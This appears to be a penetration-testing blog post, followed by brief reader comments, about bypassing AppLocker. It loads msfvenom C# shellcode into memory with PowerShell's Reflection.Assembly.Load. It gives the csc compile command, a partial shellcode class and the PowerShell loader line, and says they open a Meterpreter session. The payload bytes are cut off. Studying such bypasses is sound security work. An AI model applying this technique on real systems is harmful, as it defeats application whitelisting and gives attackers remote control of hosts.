by It is possible in an environment that AppLocker is enabled to run an executable due to the way that assemblies are loaded in .NET applications. This bypass method was discovered by Casey Smith and it was presented in ShmooCon 2015. The Assembly Load method is able to call a file from three different locations:
- Memory // Byte[]
- Location on the disk
- From a URL
The .NET assembly originally is loaded with Read permissions in order to enumerate the methods and properties associated with the binary and then permissions are changed to Execute so AppLocker or any whitelisting application cannot identify that something was executed on the system.
Bypassing AppLocker with this method consists of three steps:
- Generate C# ShellCode
- Compile the .NET application
- Execute ShellCode from Memory with Assembly Load
Metasploit MSFvenom can be used to generate C# shellcode:
The Shellcode above can be injected into the C# file which then can be compiled by the csc utility which is part of the .NET framework in order to generate the executable.
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /unsafe /platform:x86 /out:shellcode.exe shellcode.cs
Running the executable directly or from Powershell will fail since this binary is not whitelisted with an AppLocker rule.
However it is possible to bypass this restriction by using the loading assembly method in PowerShell in order to execute the ShellCode which is inside the file and it is defined as a method directly from memory.
public class Shellcode
{
public static void Exec()
{
// native function's compiled code
byte[] shellcode = new byte[354] {
The following needs to be executed from PowerShell:
$bytes = [System.IO.File]::ReadAllBytes(“C:\shellcode.exe") [Reflection.Assembly]::Load($bytes) [Shellcode]::Exec()
The shellcode will be executed and a Meterpreter session will open.
Penetration Testing Lab 
Thanks!
In case of use the ConstrainedLanguage setting for powershell, do you know if this prevent this method?
Thanks again!
That should work!